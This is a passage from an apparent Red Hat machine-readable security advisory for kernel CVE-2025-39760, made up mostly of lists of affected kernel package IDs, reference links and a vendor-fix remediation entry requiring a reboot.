"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-39760"
},
{
"category": "external",
"summary": "RHBZ#2394601",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394601"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-39760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39760"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-39760",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-39760"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025091145-CVE-2025-39760-2d5f@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025091145-CVE-2025-39760-2d5f@gregkh/T"
}
],
"release_date": "2025-09-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
